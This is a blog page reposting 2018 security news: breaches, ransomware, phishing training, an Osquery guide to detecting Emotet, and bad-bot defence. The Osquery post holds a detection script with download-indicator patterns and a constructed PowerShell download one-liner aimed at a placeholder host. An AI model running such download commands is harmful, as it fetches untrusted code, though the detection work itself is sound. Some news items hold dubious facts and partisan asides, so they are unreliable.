FireSale HackBoy


Tuesday, July 31, 2018

National Risk Management Center to guard US Energy Companies against Cyber Attacks

It’s official: a new National Risk Management Center is set to guard US energy companies against cyber attacks launched by state-funded actors. The news was shared yesterday at a New York security conference by Homeland Security Secretary Kirstjen Nielsen, who added that the top priority of the center will be to guard critical infrastructure against digital invasions from other countries.

Readers of Cybersecurity Insiders should note that the statement comes just 5 months after the top 5 pipeline operators in the US said that their third-party digital communication systems were shut down by hackers who were planning to cast a complete blackout over certain parts of America.

According to sources from Bloomberg, the center’s priority will be the assets of the energy, finance, and telecom sectors. It will then try to defend other federal IT assets such as air transport facilities, water processing plants and the like.

Note: In April this year, cybersecurity firm Symantec Corp said that it had tracked at least 140 groups targeting energy companies, up from just eighty-seven in 2015.

Last week, the US Intelligence director said that hacking groups funded by Russia, China and Iran are trying to compromise dozens of US companies, including those operating in the energy sector. Their objective is simple: to create political and economic instability.

The new US National Risk Management Center is designed to allow industry and the public sector to better coordinate on mitigating cyber risks and responding to attacks. Homeland Security is said to play a vital role here, as it has positioned itself as a convening arm that brings important sectors of America together to help organize and harmonize the counter-response.

A major cybersecurity exercise is said to be planned by DHS for later this year, and it will be along the lines of Britain’s NCSC.

Note: US President Donald Trump is leaving no stone unturned to make America the greatest. As he thinks that cyber attacks on US companies might hinder progress, he has given law enforcement full powers to coordinate and defend American IT assets from all sorts of foreign invasions, something the former US president Barack Obama is said to have ignored during his 8-9 years of tenure.

The post National Risk Management Center to guard US Energy Companies against Cyber Attacks appeared first on Cybersecurity Insiders.


August 01, 2018 at 11:07AM

Cisco sends fake phishing emails to its employees

Networking giant Cisco has sent its employees fake phishing emails in order to train them against cyber attacks. The objective was to educate them on how phishing emails hit targets and how a corporate network can be defended against such attacks.

Steve Martino, the Chief Information Security Officer at Cisco, is said to have developed this clever technique through years of experience fighting the bad guys. It’s said that Martino introduced such fake phishing email attacks into corporate operations in September last year and is known to run them on a quarterly basis.

“Like every student or office worker knows how to get out of the building fast when an emergency occurs, the same should be true in the case of cyber threats”, said Martino. His management’s aim is to set up a cybersecurity playbook with defined steps that the team needs to take in case it’s hit by the worst nightmare.

One way of defending the infrastructure is to train employees in advance against persistent cyber threats, and that is what Martino and his management are doing by launching fake email phishing attacks.

And anyone who is caught clicking on the test links is brought to an employee training video to teach them how to avoid engaging with suspicious emails in the future.

This mode of teaching or educating the employees works excellently as it helps every employee to understand their role in protecting their company against all variants of cyber threats and helps to educate them with the latest in the cyber landscape.

The success rate of Cisco’s phishing emails training is yet to be known.

The post Cisco sends fake phishing emails to its employees appeared first on Cybersecurity Insiders.


August 01, 2018 at 11:04AM

Cyber Attack news for this week

UK’s largest electronics retailer Dixons Carphone has made an official announcement on Tuesday that around 10 million records containing personal data of its customers could have been obtained in a cyber attack in 2017- which is much higher than the earlier estimates. However, the UK based company which holds a retail network clarified that the leaked records do not contain payment card or bank account details.

Now, to those who are new to this news, here’s a briefing. In June this year, an investigation revealed that one of the processing systems of Currys PC World and Dixons Travel Stores was intercepted by hackers who accessed around 5.9 million credit card data. Now, a joint investigation conducted by Britain’s National Crime Agency in association with the National Cyber Security Center says that over 10 million records were breached, but did not contain any financial info.

In other cyber attack news, extensive research conducted by Sophos has revealed that the authors or spreaders of SamSam ransomware have so far succeeded in raising almost $6 million from malware attacks. The research looked at how the SamSam ransomware originated, how it was targeted and how it has evolved since its first appearance in December 2015.

From July 24th this year, an area called Matanuska-Susitna (Mat-Su), a borough located in the Anchorage metropolitan area, is said to be suffering from a ransomware attack which disrupted the internet, phone and email services of the government networks. It has been officially reported that over 650 desktops were infected by the BitPaymer ransomware, and this includes almost 7 servers. As of Tuesday, over 110 workstations had been repaired by the IT staff of Mat-Su and some communication systems were reported to have been brought back to life.

Mat-Su IT director Eric Wyatt confirmed the news and said that FBI and the local law enforcement agencies were informed about the incident.

The January 2017 ransomware attack on the surveillance system of Washington DC’s police department is said to have been launched by two Romanians who were planning something big in the attempt. Last Friday, prosecutors issued a statement saying that the two Romanians were intending to send ransomware to more than 179,000 email addresses via the CCTV servers of Washington DC. For those who aren’t aware of this news, here’s a briefing. On January 12, 2017, i.e. a week before the 45th president Donald Trump took the oath, over 123 surveillance cameras in DC went dark.

When US law enforcement started an investigation, it discovered that the online assailants had infected 4 storage systems belonging to the CCTV servers with ransomware and were demanding a payment of about $60,000 worth of Bitcoins. But in actuality they were planning something big through the attack, which was obstructed by US law enforcement agencies in time. Both of the accused were arrested by the Romanian police last December and both confessed that they were also behind the spread of Cerber ransomware.

The post Cyber Attack news for this week appeared first on Cybersecurity Insiders.


July 31, 2018 at 09:25PM

Malware Analysis using Osquery Part 1

Tools like Sysmon and Osquery are useful in detecting anomalous behavior on endpoints. These tools give us good visibility of what’s happening on endpoints by logging multiple types of events, which we can forward to a SIEM or other correlation system for analysis.

In this blog series, we’ll analyze different malware families, looking at the types of events generated on the endpoint and how we can use Osquery to detect them.

Let’s start!

Let’s start by analyzing the famous Emotet Banking Trojan, which is a continuous threat that targets a lot of countries and company sectors (The Evolution of Emotet). The dropper spreads through email phishing and downloads the malware using a malicious Office macro.

File samples:

https://app.any.run/tasks/b30d3215-a238-415e-ba7d-a884e1505758

https://www.virustotal.com/#/file/c932d54a9ef3c645a28b7d8de9747fc6c06fc23c6d65c036da4eae4d778a81db

As we can see in the sandbox report, the Office macro executes PowerShell with an encoded command to download the payload.

If we run the sample in our environment with Osquery installed, we can build a query to retrieve events generated by PowerShell from the powershell_events table. Osquery reads the Microsoft-Windows-PowerShell eventlog channel, so you need to enable Script block logging.

We can see the encoded PowerShell command and also the script text code generated after decoding the command.
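An added example, not part of the original post: decoding the -EncodedCommand argument (Base64 of UTF-16LE text) found in a PowerShell command line and flagging download behaviour in the decoded script, which is the manual step described above. The sample command lines, the example.invalid URL and the indicator patterns are constructed for illustration.

```python
import base64
import binascii
import re

# Heuristic patterns for "this script fetches something" (assumed, not exhaustive).
DOWNLOAD_INDICATORS = {
    "webclient": re.compile(r"net\.webclient", re.I),
    "download_method": re.compile(r"\.download(file|string|data)\b", re.I),
    "web_cmdlet": re.compile(r"\b(invoke-webrequest|iwr|start-bitstransfer)\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"\)]+", re.I)


def find_encoded_argument(cmdline):
    """Return the Base64 argument of -EncodedCommand (or an abbreviation), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok[1:].lower()
        # PowerShell accepts prefixes (-e, -en, -enc, ...) and the alias -ec.
        if flag and ("encodedcommand".startswith(flag) or flag == "ec"):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64_text):
    """Decode Base64 to UTF-16LE text, the encoding -EncodedCommand expects."""
    try:
        raw = base64.b64decode(b64_text, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Decode one command line and report which download indicators it matches."""
    b64_text = find_encoded_argument(cmdline)
    if b64_text is None:
        return {"encoded": False, "decoded": None, "indicators": [], "urls": []}
    script = decode_encoded_command(b64_text)
    if script is None:
        # Flag present but payload not decodable: worth an analyst's look by itself.
        return {"encoded": True, "decoded": None, "indicators": ["undecodable"], "urls": []}
    hits = sorted(name for name, rx in DOWNLOAD_INDICATORS.items() if rx.search(script))
    return {"encoded": True, "decoded": script, "indicators": hits,
            "urls": URL_RE.findall(script)}


def encode_for_sample(script):
    """Build an -EncodedCommand value for the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample data: a download one-liner pointing at a placeholder host.
CONSTRUCTED_SCRIPT = (
    "(New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/p', 'C:\\Users\\Public\\p.bin')"
)
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -enc " + encode_for_sample(CONSTRUCTED_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -e " + encode_for_sample("Get-Date"),
    "powershell.exe -EncodedCommand not*base64",
]


def run_samples():
    """Triage every constructed sample command line."""
    return [triage(c) for c in SAMPLE_CMDLINES]


if __name__ == "__main__":
    for cmdline, result in zip(SAMPLE_CMDLINES, run_samples()):
        print(cmdline[:60], "->", result["indicators"], result["urls"])
```

The same function can be run over the cmdline column of the processes table or over exported event rows to prioritise which encoded commands an analyst reads first.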

While PowerShell is downloading the payload, Osquery can log socket connections opened by any process. We can do an easy JOIN between the process_open_sockets table and the processes table to see which processes are making network connections.

It’s interesting to see which files have been written on disk during the payload download. To do so, we can query the file table that stores some useful fields (file table schema). This table needs a WHERE condition to return results, so we can add some filters like Users directory and files created in the last 100 seconds for example.

The file downloaded by PowerShell is an Emotet dropper that extracts the final payload and executes it (squarectx.exe). Now, let’s query the system’s running processes. Similar to above, we can do a JOIN with the users table to see the username column. Some rows have been omitted for a cleaner view.

Now we know that Emotet malware is running in our environment and probably is doing malicious things, so let’s look for signs of malware activity. For that, we reuse the query we used above to see network connections from system processes. Here, we can detect communication to the Command and Control server.

As we have seen, it is possible to analyze malware and extract valuable information using tools like Osquery that give us rich visibility of systems events.

How AlienVault uses Osquery

Osquery allows you to retrieve a wealth of events and useful information from your endpoints. This can be extremely helpful for investigating security incidents as well as threat hunting activities on your critical assets.

AlienVault leverages Osquery through the AlienVault Agent to enable threat hunting in both USM Anywhere and the Open Threat Exchange.  

The AlienVault Agent is a lightweight, adaptable endpoint agent based on Osquery and maintained by AlienVault. In USM Anywhere, the AlienVault Agent enables continuous endpoint monitoring, using the built-in AlienVault threat intelligence to automate endpoint queries and threat detection alongside your other network and cloud security events. This allows USM Anywhere to deliver endpoint detection and response (EDR), file integrity monitoring (FIM), and rich endpoint telemetry capabilities that are essential for complete and effective threat detection, response, and compliance.

Try it for yourself in the USM Anywhere Online Demo.

In April, AlienVault introduced the Endpoint Threat Hunter  – a free threat-scanning service in Open Threat Exchange® (OTX™) based on the AlienVault Agent. OTX Endpoint Threat Hunter allows anyone to determine if their endpoints are infected with the latest malware or other threats by manually scanning their endpoints for the presence of indicators of compromise (IoCs) that are catalogued in OTX.

Get started with OTX Endpoint Threat Hunter Free: https://otx.alienvault.com/endpoint-threat-hunter/welcome

Here is an example of how we detected Emotet infection on an analysis system using OTX Endpoint Threat Hunter.

In the next posts of this blog series, we will look at other malware families and explore how to detect activity like system persistence and many other techniques.

Stay tuned!

Appendix

Queries

select time, script_text from powershell_events;

select processes.name, process_open_sockets.remote_address, process_open_sockets.remote_port from process_open_sockets LEFT JOIN processes ON process_open_sockets.pid = processes.pid WHERE process_open_sockets.remote_port != 0 AND processes.name != '';

select path, size from file where path like 'C:\Users\%%' and mtime > (select local_time from time) - 100 and filename != '.';

select processes.pid, users.username, processes.path from processes LEFT JOIN users ON processes.uid = users.uid WHERE processes.path != '';


OTX

https://otx.alienvault.com/browse/pulses?q=emotet

       

The post Malware Analysis using Osquery Part 1 appeared first on Cybersecurity Insiders.


July 31, 2018 at 09:09PM

Monday, July 30, 2018

Hackers target UnityPoint Health with email phishing scam

UnityPoint Health, an Iowa based healthcare provider has announced that it has become a victim of a recent email phishing scam which could have compromised the health and personal information of more than 1 million patients including social security numbers and critical financial information.

The healthcare services provider, which has a network of hospitals, clinics, and home care services in Iowa, Illinois and Wisconsin, says that data related to more than 1.45 million patients could have been accessed by hackers during the cyber attack that was launched on the servers holding internal email accounts between March 14 and April 3rd.

In a statement released on Monday, the nonprofit organization said that the attack on its servers was discovered on May 31st this year and that law enforcement and a third-party security company were pressed into service to investigate the matter in detail.

The investigation revealed that the attack was not caused by an insider threat and confirmed that some officials were tricked via email to provide login credentials to give internal email access to attackers.

All the patients who were affected by the incident have been informed via mail by UnityPoint, and the health services provider issued an apology for the data spill. For those people whose Social Security or driving license numbers were leaked, the company is ready to offer a free credit monitoring service for one full year from June 1st, 2018. A helpline has been set up to assist patients in this regard, and the number is 888-266-9285.

As a precautionary measure, the company has reset the passwords of all compromised accounts, implemented multi-factor authentication for users, added advanced threat detection technology and is said to have conducted mandatory education for employees after the breach.

The post Hackers target UnityPoint Health with email phishing scam appeared first on Cybersecurity Insiders.


July 31, 2018 at 10:55AM

Oversharing of information on social media is resulting in money loss

Young people, especially those in their mid-20s to 30s, are said to be falling prey to fraudsters due to oversharing of their information on social media. This is leading to account hacks and sometimes to the loss of money from their bank accounts.

A survey conducted by Nationwide Building Society in the UK has divulged in its report that 83% of British people overshare on social media, often leading to drained bank accounts.

The survey discovered that more than 4 in ten admitted that they or one of their friends have lost money as a result of a social media hack. They still do not know how the incident took place but admitted that they share important info about themselves online, including their birthday, place of work or their current location.

Although it might prove trivial for hackers to carve out a user profile from such data, in most cases hackers are able to piece the info together and use it to take over users’ online accounts and even steal money.

Nowadays, as some shopping websites allow users to shop with social media credentials such as Facebook, the situation has deteriorated further, especially for those along the lines of Farmville.

It’s obvious that social media is proving to be a great platform to connect with friends and family members. But at the same time, it’s a fact that some data sharing blunders committed by social networking users are proving to be gold for hackers.

So, how to isolate yourselves from such online frauds?
•    Remember, no bank or organization will ask you for your PIN, password or other credentials, whether by call, SMS or email.
•    Hand over your personal and financial details only to entities which you trust.
•    Never click on email links sent from unknown sources or from servers which pretend to be legitimate.
•    If someone approaches you on a manual note to provide credentials, immediately report the activity to your bank authorities.

Hope, it helps in curbing the online fraud menace!

The post Oversharing of information on social media is resulting in money loss appeared first on Cybersecurity Insiders.


July 31, 2018 at 10:52AM

McAfee says fileless cyber attacks are on the rise

American computer security software company McAfee has released a security report for 2Q 2018 which says that ‘fileless’ cyber attacks are on the rise in 2018 and that they are leveraging trusted Windows executables to invade systems and breach corporate networks.

Note: A fileless cyber attack, also called a zero-footprint attack, macro attack or non-malware attack, works by taking advantage of applications that are already installed on the infected PC. The malware is virtual and, in most cases, lives in memory until the system is rebooted.

According to the global security report of McAfee Labs, CactusTorch proved the most notorious of the fileless threats; it uses the ‘DotNetToJScript’ technique, which loads and executes malicious .NET assemblies straight from memory. As both corporations and individuals have fallen prey to this threat, the surge was observed to be over 432% compared with 2017.

And, as expected, this attack technique can bypass antivirus software and corporate firewalls without being detected, as it takes advantage of the trust between security software and genuine signed Windows applications.

McAfee says the only way to protect networks against such attacks is to invest in primary security protections like high-grade end-to-end encryption, 2-factor authentication, and installation of the latest efficient anti-virus solutions which are updated regularly. Having controlled and efficient administrative access also plays a vital part in securing a business from attacks.

Educating the staff and the C-level management about the existing and upcoming security threats could play a vital role in nullifying all variants of detrimental fileless attacks on an organization.

The post McAfee says fileless cyber attacks are on the rise appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:20PM

Hope for the Best, Plan for the Worst

In an attempt to wake up companies that may not be taking security as seriously as they should, they are often told, “It’s not a matter of if, but when.”

Historically, I’ve not been the biggest fan of this term, in that it has a certain undertone of doom and gloom. A bit like one of those life insurance commercials that morbidly remind you that you will die some day and you want your loved ones to be looked after financially.

The reality, though, is that as depressing as it may sound, we will all die at some point. And it is likely that a company that uses technology and is connected to the internet in some way, shape or form will experience an incident of some magnitude over the course of its life.

Being attacked or compromised by an external or internal party isn’t a black swan event that falls outside of the norm. It’s very much a part of everyday life.

Where many companies go wrong is believing they can eliminate these attacks completely. But this isn’t practical because randomness and variability are the rule, not the exception.

It’s like when you have a flight to catch, most people will tend to leave earlier than needed to factor in unforeseen traffic, or other delays. Because we know and understand that a journey consisting of planes, trains, and automobiles will inevitably encounter some delays. So we plan for it.

Similarly, enterprises should plan for the unexpected and build it into their fabric to ensure they can not only remain resilient, but flourish in times of adversity.

So, what can make a company more resilient to security incidents and black swan events?

Hack yourself

What better way to see how an attacker will fare against your systems than to subject your systems yourself to the same stresses? It’s not so much a case of proving that all your systems are unbreakable, but rather it gives you a level of assurance as to how long your defences can hold up, whether you have effective means of detecting and responding, and perhaps more importantly, what the impact on the business or customers will be.

Add redundancies

Often, when speaking of redundancies, we think of business continuity planning, which many inevitably boil down to the art of “buying two of everything.”

Often a company may avoid the cost associated with having redundant systems because they may never be used. The truth, though, is that not needing a redundant system is the exception, not the rule.

It’s also important to have alternative redundancies in place. For example, if a system goes down, is there a manual workaround that could be deployed? Could online transactions be diverted to call centres? If cash is unavailable, can cryptocurrencies be used? Or precious metals? Or cigarettes even.

Not all risks are created equal

Critical assets are the life blood of an organisation. They are the crown jewels that help the company be profitable through sales, services, or innovation. But it can become easy to miss some of the risks amongst the large sea of issues.

Which is why it can make sense for companies to at least adopt a dual risk strategy whereby they can play it safe in some areas and take more risks in others.

Have multiple points of resilience

It’s not just attacks that are on the rise. There are a number of factors such as errors, changes, or infrastructure migrations that can all lead to security incidents. Therefore it’s important to build resilience at multiple points across the business.

Maybe it’s time to stop fearing, or thinking of the phrase, “it’s not if, but when” in a negative light – but rather as a positive opportunity – one that can allow security teams to proactively innovate to get the best outcome for themselves, and their company.

      

The post Hope for the Best, Plan for the Worst appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:08PM

The Bitglass Blog

If the volume and level of conversations we enjoyed at the RSA Conference in Singapore last week are anything to go by, Bitglass and the partners in our Altitude Partner Program have every reason to feel optimistic about the Asia Pacific region.

For three days on the show floor, the Bitglass stand was consistently busy with visitors asking about our Next-Gen CASB and how we can help them solve data security problems relating to the use of cloud and mobile devices. Unlike some previous events, we spent little time having to answer “What’s a CASB?” or “Why would we need a CASB?”

The post The Bitglass Blog appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:08PM

How to Make Remote Work Easy

The commute is killing you. You sit in endless boring meetings. Phones are ringing and your colleague is moving his table for the fifth time today. Someone is looking over your shoulder. The suit that you’re wearing is uncomfortable.

Isn’t the nine-to-five day great? Thankfully, today we have a contender: working remotely.

When working remotely you get all the benefits that you’ve heard and imagined before — work in your sweatshirt, no more commuting, save money on lunch by eating cheap and healthy food, attend only meetings that you absolutely have to, be more productive and, of course, manage your time the way you see fit.

More and more people are switching to remote work, but it would be pointless for your employer or your career if working from a hammock on a remote beach caused productivity to suffer. Fortunately, there are plenty of software tools to make the transition easier, all you need is WiFi or some form of internet access. In this article, we’ll take a look at some of those tools that make remote work easy.

 

1. Google Drive

2. Box Note Taking

3. Egnyte Connect

4. Slack

5. Trello

 


The post How to Make Remote Work Easy appeared first on Cybersecurity Insiders.


July 30, 2018 at 11:58AM

Sunday, July 29, 2018

Telegram Passport number addition surges data privacy concerns

Britain’s messaging app Telegram has added a new feature onto its platform which allows users to store their identity documents such as Passport Numbers or social security numbers on telegram’s encrypted cloud storage. The objective of this feature is to allow users to showcase their identity documents to Initial Coin Offerings (ICOs) and cryptocurrency exchange sites to verify their identity.

But security experts suggest that identity documents storage on cloud storage platforms can invite more trouble to those who are strictly concerned about data privacy. It’s like pleading hackers to invade your privacy.

However, Telegram says that the data loaded onto its cloud platforms will be highly protected and has specified in its statement that users will be the sole proprietors to whatever data is being fed to the cloud by them.

As the usage of cryptocurrency is spreading like wildfire all throughout the world, and as the holiday season is fast approaching, companies dealing with digital coins or those acting as payment gateways to cryptocurrencies like Bitcoins, Monero and Litecoins are and will insist on users proving their identity to the service providers.

“This is where the trouble starts..” says Elliot Anderson, a French security expert. Elliot, who owns a security company doing pen tests, says that sharing sensitive information can put your future in jeopardy. The data can land you in financial fraud and can also lead you into a legal mess.

Meanwhile, Telegram has issued a press statement that the data stored on its cloud will be in highly encrypted form and will soon be moved to a decentralized storage i.e dispersed storage platforms.

Note: Telegram is a cloud-based instant messaging app which also offers VoIP services. Although the company claims to have registered itself in London, its founder and entrepreneur Pavel Durov has accepted that the servers of the said app operate from his home country Russia. Countries like Indonesia, Iran, and Russia tried their best, to a certain extent, to ban the app. But it’s said that only Iran succeeded in doing so completely, while Indonesia and Russia failed in their attempts due to the app’s immense popularity among the internet-using populace of their respective countries.

The post Telegram Passport number addition surges data privacy concerns appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:56AM

Indian Prime Minister challenged by French Security Expert for Aadhaar details

Indian Prime Minister Shri Narendra Modi was challenged by a French security expert named Elliot Anderson to share his Aadhaar details, that is, if he has one. The challenge comes just after the exposure of certain sensitive details like the passport number, email ID, PAN number, alternative phone number, WhatsApp profile photo and mobile number of the Indian Telecom Chief RS Sharma.

Now, for those who aren’t aware of what is happening, here’s a briefing on the whole issue.

Last week, Telecom Regulatory Authority of India (TRAI) chairman RS Sharma displayed his Aadhaar number on his Twitter handle and challenged the world to expose his personal details based on just his UID number.

Note 1: The Aadhaar number is a 12-digit Unique Identity Number that can be obtained by residents of India, based on their biometric and demographic details. It is in line with the Social Security Number which is assigned to each American individual in the United States and Singapore.

Anderson, who often interacts with the world through his @kingslyj Twitter handle, accepted the challenge of Mr. RS Sharma and exposed all the personal details of the TRAI chief within 3 hours. He also posted a picture of Mr. Sharma on his Twitter handle, blackened the face of a lady posing beside Sharma and added the quote “I suppose she is your wife or daughter”.

Some more ethical hackers accepted the challenge of Sharma and posted details such as his iPhone IMEI number and the bank accounts to which his Aadhaar card was linked.

Note 2- On March 10th, 2018, Anderson started an Anti-Aadhaar campaign by announcing to the world that he will start playing with the UID numbers of Indians. After three days of his announcement, he posted details of around 20K UID cards online followed by the passwords which were protecting them through encryption on the database.

Recently, the Prime Minister’s Office in India has announced that the introduction of Aadhaar has added great strength to India’s economy and the country’s further development by saving Rs 60,000 Cr dispersed via various government subsidies which were earlier reaching to ‘wrong hands’.

Now, Elliot has asked the Indian Prime Minister to dare share his Aadhaar details to see what secrets he could expose of the BJP Leader who is leading the Indian subcontinent standing 6th in the world’s largest economies.

The post Indian Prime Minister challenged by French Security Expert for Aadhaar details appeared first on Cybersecurity Insiders.


July 30, 2018 at 09:52AM

The Pirate Bay alternatives (2018) in wake of Cryptomining scandal

By Waqas

The process of cryptocurrency mining slows down your computer and increases the energy bill – That is why it is time to find The Pirate Bay alternatives. The Pirate Bay is undoubtedly one of the most visited torrenting and file sharing websites. But did you know ThePirateBay.org is using the computing power (CPU) of your computer to mine cryptocurrency? […]

This is a post from HackRead.com Read the original post: The Pirate Bay alternatives (2018) in wake of Cryptomining scandal


July 30, 2018 at 04:03AM

Parasite HTTP RAT loaded with advanced detection evasion capability

By Waqas

Proofpoint researchers have discovered a new remote access Trojan (RAT) as well as an updated version of an already identified banking Trojan and claim that both the RATs are involved in recently detected phishing campaigns targeting the retail, healthcare and IT industries. Emails containing MS Word attachments are being sent, which contain hidden malicious macros […]

This is a post from HackRead.com Read the original post: Parasite HTTP RAT loaded with advanced detection evasion capability


July 29, 2018 at 04:00PM

Saturday, July 28, 2018

Flaw in Swann smart security cameras allows access to user’s live stream

By Waqas

Security cameras and other IoT devices have been frequently identified to be incompetent and plagued with a variety of built-in flaws that render them vulnerable to exploitation by hackers. The same has been proven yet again by a team of security researchers from Pen Test Partners. Researchers Andrew Tierney, Chris Wade, and Ken Munro participated […]

This is a post from HackRead.com Read the original post: Flaw in Swann smart security cameras allows access to user’s live stream


July 28, 2018 at 08:38PM

RFA Secures Office 365 with the Next-Gen CASB

This post was originally published here by Jennifer Perisho.

A few weeks ago, Bitglass’ CMO Rich Campagna sat down with the CIO and CTO of Richard Fleischman & Associates (RFA) for our latest customer testimonial video. As a technology advising and consultancy group, RFA has spent over thirty years providing its clients with IT security tools that can protect sensitive financial data. In addition to protecting its own data in apps like Office 365, part of RFA’s search for cloud security was to identify a technology that its customers could use to protect their information as it moves off premises.

Naturally, RFA turned to Bitglass, the Next-Gen CASB. With smooth deployment, next-gen technology, and unparalleled customer support, RFA’s CIO quickly recognized the value of Bitglass’ solution. Together RFA and Bitglass have been rockin’ the CASB! Watch the video below.


The post RFA Secures Office 365 with the Next-Gen CASB appeared first on Cybersecurity Insiders.


July 28, 2018 at 05:46PM

A GROWING NUISANCE: HOW TO FEND OFF BAD BOTS

This post was originally published here by (ISC)² Management.

Bad bots make up more than one third of internet traffic, and although some of them try to influence elections and feed conflict on social media, most are targeting business websites, according to a newly published report.

Set loose across the internet, armies of bad bots constantly carry out a multitude of misdeeds against businesses in just about every industry. Their activities include scraping prices by competitors looking to gain an upper hand in price SEO searches, stealing proprietary content, taking over accounts with stolen credentials, perpetrating credit card fraud, skimming money from gift card accounts and executing DDoS (distributed denial of service) attacks.

In 2017, bad bot internet traffic grew 9.5 percent to about 22 percent of all traffic, primarily targeting industries such as gambling, airlines, finance, healthcare and retail, according to the 2018 Bad Bot Report published by Distill Networks.

“Bad bots interact with applications in the same way a legitimate user would, making them harder to detect,” according to the report. “Bots enable high-speed abuse, misuse, and attacks on your websites and APIs. They enable attackers, unsavory competitors, and fraudsters to perform a wide array of malicious activities.”

See No Evil

Fighting bad bots is time-consuming and challenging. Their origins are difficult to determine, and if an organization attempts to take legal action against perpetrators, it will likely run into roadblocks. Such action is costly and if the bot operators are in a different country, legal action may prove futile.

Businesses often ignore bots because they don’t understand the damage they cause. While a business turns a blind eye, bots could be stealing valuable intellectual property, breaking into user accounts or carrying out some other mischief. Any of these activities can cause financial losses, incur mitigation costs and hurt a company’s reputation once a breach becomes public.

Cybersecurity teams cannot afford to ignore bad bots, considering that according to Distill Networks, “every business with an online presence is regularly bombarded by bad bots.” As such, every company needs a plan to deal with this cyber nuisance.

Fight Back

The bad bot report includes a set of recommendations for businesses to protect themselves. Bad bots target different businesses and industries for different reasons, so there is no single solution for the problem.

However, here are some measures you can take:

  • Block outdated user agents and browsers
  • Block suspicious hosting and proxy services
  • Monitor traffic sources to spot bot activity
  • Investigate traffic spikes generated by a suspicious single source
  • Keep an eye on every bot access point, including websites and mobile apps
  • Monitor for failed login attempts and failed validation of gift card numbers
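Three of these measures (outdated user agents, spikes from a single source, repeated failed logins or gift card validations) can be checked directly against web access logs. The sketch below is an added example, not part of the report or the original post; the thresholds, the endpoint paths, the failure status codes and the log lines are all constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Assumed policy values for this sketch; tune them to your own traffic.
MIN_BROWSER_MAJOR = {"Chrome": 60, "Firefox": 55, "MSIE": 11}
SPIKE_PER_MINUTE = 5                 # max requests per IP per minute
FAILED_LIMIT = 3                     # failed logins / gift card checks per IP
SENSITIVE_PATHS = {"/login", "/giftcard/validate"}   # hypothetical endpoints
FAILURE_STATUSES = {401, 403, 422}   # assumed "validation failed" responses

# Combined Log Format: ip - - [time] "METHOD path proto" status size "ref" "ua"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
UA_RE = re.compile(r'(Chrome|Firefox)/(\d+)|(MSIE) (\d+)')


def parse(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def outdated_agent(ua):
    """True if the UA names a known browser below the minimum major version."""
    m = UA_RE.search(ua)
    if not m:
        return False  # unknown agents need a separate policy decision
    name = m.group(1) or m.group(3)
    major = int(m.group(2) or m.group(4))
    return major < MIN_BROWSER_MAJOR[name]


def analyze(lines):
    """Map each flagged source IP to the sorted list of reasons it was flagged."""
    per_minute, failed = Counter(), Counter()
    findings = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if outdated_agent(rec["ua"]):
            findings[ip].add("outdated-user-agent")
        # Spike check: count requests per source within each clock minute.
        key = (ip, rec["ts"].replace(second=0))
        per_minute[key] += 1
        if per_minute[key] > SPIKE_PER_MINUTE:
            findings[ip].add("traffic-spike")
        # Failed logins and failed gift card validations on sensitive paths.
        path = rec["path"].split("?")[0]
        if (rec["method"] == "POST" and path in SENSITIVE_PATHS
                and rec["status"] in FAILURE_STATUSES):
            failed[ip] += 1
            if failed[ip] >= FAILED_LIMIT:
                findings[ip].add("repeated-failed-validation")
    return {ip: sorted(tags) for ip, tags in findings.items()}


def _line(ip, ts, method, path, status, ua):
    return (f'{ip} - - [{ts} +0000] "{method} {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')


CHROME_67 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36")
IE_8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
FIREFOX_40 = "Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0"

# Constructed sample traffic using documentation-only IP ranges.
SAMPLE_LOG = (
    [_line("203.0.113.7", "28/Jul/2018:10:00:05", "GET", "/", 200, CHROME_67),
     _line("203.0.113.7", "28/Jul/2018:10:00:41", "POST", "/login", 200, CHROME_67),
     _line("198.51.100.23", "28/Jul/2018:10:01:10", "GET", "/products", 200, IE_8)]
    + [_line("192.0.2.50", f"28/Jul/2018:10:02:{s:02d}", "POST",
             "/giftcard/validate", 422, CHROME_67) for s in (1, 9, 17, 25)]
    + [_line("192.0.2.99", f"28/Jul/2018:10:03:{s:02d}", "GET",
             f"/prices?page={s}", 200, FIREFOX_40) for s in range(7)]
)

if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

Flagged sources are candidates for investigation or rate limiting rather than automatic blocking, since a shared NAT address or an old corporate browser can trip the same rules.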

Data and People

Understanding how bad bots operate, and what they are after, is crucial to figuring out how to fight them. It takes a combination of technology, security best practices and well-crafted policies to address bad bots, as is the case with most cybersecurity challenges.

